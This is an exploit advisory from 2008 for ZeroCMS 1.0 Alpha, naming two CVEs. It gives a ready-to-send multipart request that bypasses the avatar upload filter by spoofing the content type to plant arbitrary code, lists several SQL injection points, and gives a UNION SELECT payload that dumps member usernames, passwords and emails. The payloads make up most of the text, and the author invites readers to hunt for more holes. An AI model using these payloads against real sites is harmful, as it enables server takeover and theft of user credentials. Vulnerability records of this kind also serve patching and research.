ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection

Related Vulnerabilities: CVE-2008-0233   CVE-2008-0232  
Publish Date: 08 Jan 2008
 |    ____            __________         __             ____  __      |
 |  /_   | ____     |__\_____  \  _____/  |_          /_   |/  |_     |
 |   |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\    |
 |   |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |      |
 |   |___|___|  /\__|  /______  /\___  >__|            |___||__|      |
 |            \/\______|      \/     \/                               |
 |    Zero CMS Remote Arbitrary File Upload / SQL Injections          |
 |			Version: <= 1.0 Alpha (Last)                  |
 |			Vendor:                      |
 |			Discovered by: KiNgOfThEwOrLd                 |
 |				Intro:                                |
 |                                                                    |
 | An attacker can bypass the avatar upload extension filter editing  |
 |  the contenet type propriety                                       |
 |				Exploit:                              |
 |                                                                    |
 | Submit to index.php?act=usercp&action=avatar a request like this:  |
 |                                                                    |
 |	-----------------------------4629606643545053171986629955\r\n |
 |	Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n      |
 |	\r\n                                                          |
 |	20000\r\n                                                     |
 |	-----------------------------4629606643545053171986629955\r\n |
 |	Content-Disposition: form-data; name="avupload"; filename="   |
 |	[FILENAME].[EVIL_EXTENSION]"\r\n                              |
 |	Content-Type: image/jpeg\r\n 				      |
 |	\r\n							      |
 |	[EVIL_CODE]\n						      |
 |	\r\n							      |
 |	-----------------------------4629606643545053171986629955\r\n |
 |	Content-Disposition: form-data; name="submit"\r\n	      |
 |	\r\n							      |
 |	Upload\r\n						      |
 |	-----------------------------4629606643545053171986629955-\r\n|
 | 				SQL Injections:                       |
 |                                                                    |
 | The most of the variable related with the database are not properly|
 | checked. Then, we get a lots of possible sql injections.           |
 |				Some Examples:                        |
 |                                                                    |
 |			index.php?act=poll&mode=view&id=%27           |
 |			forums/index.php?f=%27                        |
 |			forums/index.php?t=%27                        |
 |      		    An Exploit Example:                       |
 |		                                                      |
 | index.php?act=poll&mode=view&id=9999+union+all+select+1,username,  |
 | password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members            |
 | Surelly there are other not filtred vars, but i don't feel like to |
 | check, if u want u can find that yourself, dont you? :P            |

# [2008-01-08]